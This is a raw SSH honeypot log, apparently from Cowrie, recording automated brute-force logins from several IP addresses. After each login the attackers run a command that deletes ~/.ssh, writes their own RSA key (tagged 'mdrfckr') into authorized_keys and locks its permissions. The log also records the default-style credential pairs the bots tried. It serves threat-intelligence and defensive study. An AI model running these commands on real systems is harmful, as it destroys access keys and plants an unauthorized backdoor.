{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:25.979160Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:26.471214Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:38:26.471931Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:38:26.654631Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:26.655700Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.142.227","src_port":59378,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6cee446cd7","protocol":"ssh","message":"New connection: 14.103.142.227:59378 (1.2.3.4:22) [session: da6cee446cd7]","sensor":"my-vps","timestamp":"2025-08-28T07:38:26.853745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:26.854681Z","src_ip":"14.103.142.227","session":"da6cee446cd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:27.045019Z","src_ip":"14.103.142.227","session":"da6cee446cd7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:38:27.849785Z","src_ip":"14.103.142.227","session":"da6cee446cd7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:29.043800Z","src_ip":"14.103.142.227","session":"da6cee446cd7"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.142.227","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b4380e2ad94","protocol":"ssh","message":"New connection: 14.103.142.227:59392 (1.2.3.4:22) [session: 6b4380e2ad94]","sensor":"my-vps","timestamp":"2025-08-28T07:38:29.247047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:29.247783Z","src_ip":"14.103.142.227","session":"6b4380e2ad94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:29.453499Z","src_ip":"14.103.142.227","session":"6b4380e2ad94"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:30.852498Z","src_ip":"14.103.142.227","session":"6b4380e2ad94"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:31.051262Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:31.059972Z","src_ip":"14.103.142.227","session":"6b4380e2ad94"}
{"eventid":"cowrie.session.connect","src_ip":"203.205.37.233","src_port":59760,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcaee74e7620","protocol":"ssh","message":"New connection: 203.205.37.233:59760 (1.2.3.4:22) [session: bcaee74e7620]","sensor":"my-vps","timestamp":"2025-08-28T07:38:31.738030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:31.743535Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:32.022763Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.login.success","username":"root","password":"new_password","message":"login attempt [root/new_password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:33.153774Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:33.818467Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:33.819259Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:33.820168Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:34.102644Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:34.694122Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:38:34.694945Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:38:34.976727Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:34.977732Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.session.connect","src_ip":"203.205.37.233","src_port":60514,"dst_ip":"1.2.3.4","dst_port":22,"session":"69f60c363a21","protocol":"ssh","message":"New connection: 203.205.37.233:60514 (1.2.3.4:22) [session: 69f60c363a21]","sensor":"my-vps","timestamp":"2025-08-28T07:38:35.262724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:35.263499Z","src_ip":"203.205.37.233","session":"69f60c363a21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:35.551727Z","src_ip":"203.205.37.233","session":"69f60c363a21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:38:36.733440Z","src_ip":"203.205.37.233","session":"69f60c363a21"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:38.025551Z","src_ip":"203.205.37.233","session":"69f60c363a21"}
{"eventid":"cowrie.session.connect","src_ip":"203.205.37.233","src_port":32928,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ea9c117a7b8","protocol":"ssh","message":"New connection: 203.205.37.233:32928 (1.2.3.4:22) [session: 8ea9c117a7b8]","sensor":"my-vps","timestamp":"2025-08-28T07:38:38.310351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:38.318414Z","src_ip":"203.205.37.233","session":"8ea9c117a7b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:38.600957Z","src_ip":"203.205.37.233","session":"8ea9c117a7b8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:39.747187Z","src_ip":"203.205.37.233","session":"8ea9c117a7b8"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:40.038465Z","src_ip":"203.205.37.233","session":"bcaee74e7620"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:40.041195Z","src_ip":"203.205.37.233","session":"8ea9c117a7b8"}
{"eventid":"cowrie.session.connect","src_ip":"197.248.104.19","src_port":45366,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e550515d920","protocol":"ssh","message":"New connection: 197.248.104.19:45366 (1.2.3.4:22) [session: 3e550515d920]","sensor":"my-vps","timestamp":"2025-08-28T07:38:43.676378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:43.677341Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:43.842422Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.login.success","username":"root","password":"1111qqqq","message":"login attempt [root/1111qqqq] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:44.545263Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:44.954781Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:44.955639Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:44.956475Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.122022Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:45.536860Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.537580Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.704281Z","src_ip":"197.248.104.19","session":"3e550515d920"}
